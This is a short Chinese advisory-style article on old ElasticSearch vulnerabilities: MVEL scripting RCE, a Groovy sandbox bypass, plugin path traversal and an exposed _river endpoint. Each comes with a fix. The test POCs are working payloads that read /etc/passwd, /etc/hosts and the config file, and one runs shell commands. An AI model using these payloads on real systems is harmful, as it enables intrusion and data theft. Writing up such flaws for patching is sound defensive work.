ElasticSearch是JAVA开发的一个基于Lucene的搜索服务器,它提供了一个分布式多用户能力的全文搜索引擎。
很多小伙伴用ElasticSearch配合其它工具进行日志分析平台的搭建,但是ElasticSearch不同版本存在多个漏洞。
漏洞介绍:
ElasticSearch有脚本执行(scripting)的功能,可以很方便地对查询出来的数据再加工处理。ElasticSearch用的脚本引擎是MVEL,这个引擎没有做任何的防护,或者沙盒包装,所以直接可以执行任意代码。
而在ElasticSearch 1.2之前的版本中,默认配置是打开动态脚本功能的,如果用户没有更改默认配置文件,攻击者可以直接通过http请求执行任意代码。
测试POC:
http://127.0.0.1:9200/_search?source=%7B%22size%22%3A1%2C%22query%22%3A%7B%22filtered%22%3A%7B%22query%22%3A%7B%22match_all%22%3A%7B%7D%7D%7D%7D%2C%22script_fields%22%3A%7B%22%2Fetc%2Fhosts%22%3A%7B%22script%22%3A%22import%20java.util.*%3B%5Cnimport%20java.io.*%3B%5Cnnew%20Scanner(new%20File(%5C%22%2Fetc%2Fhosts%5C%22)).useDelimiter(%5C%22%5C%5C%5C%5CZ%5C%22).next()%3B%22%7D%2C%22%2Fetc%2Fpasswd%22%3A%7B%22script%22%3A%22import%20java.util.*%3B%5Cnimport%20java.io.*%3B%5Cnnew%20Scanner(new%20File(%5C%22%2Fetc%2Fpasswd%5C%22)).useDelimiter(%5C%22%5C%5C%5C%5CZ%5C%22).next()%3B%22%7D%7D%7D&callback=jQuery111107529820275958627_1400564696673&_=1400564696674
修复方法:
1,升级ElasticSearch为最新版本;
2,在配置文件elasticsearch.yml里为每一个节点都加上:script.disable_dynamic: true。
漏洞案例:
漏洞介绍:
该漏洞主要存在于ElastciSearch 1.3.0-1.3.7和1.4.0-1.4.2,ElasticSearch在比较新的版本中脚本语言引擎使用了Groovy,并且加入了沙盒进行控制,危险代码会被拦截掉。由于沙盒限制不严格,导致存在该漏洞。
测试POC:
POST http://127.0.0.1:9200/_search?pretty {"size":1,"script_fields": {"test#": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat /etc/passwd\").getInputStream())).readLines()","lang": "groovy"}}}
修复方法:
1,升级ElasticSearch为最新版本;
2,在配置文件elasticsearch.yml里为每一个节点都加上:script.groovy.sandbox.enabled: true。
漏洞案例:
测试POC:
curl http://127.0.0.1:9200/_plugin/head/../../config/elasticsearch.yml 注意curl版本 curl http://127.0.0.1:9200/_plugin/插件名称如head/../../xx文件
修复方法: 1,升级ElasticSearch为最新版本
测试POC:
http://localhost:9200/_river/search
修复方法:
1、安装elasticsearch官方的Shield
2、添加iptables规则
3、设置elasticsearch.yml文件中的network.bind_host: 内网ip,仅允许内网访问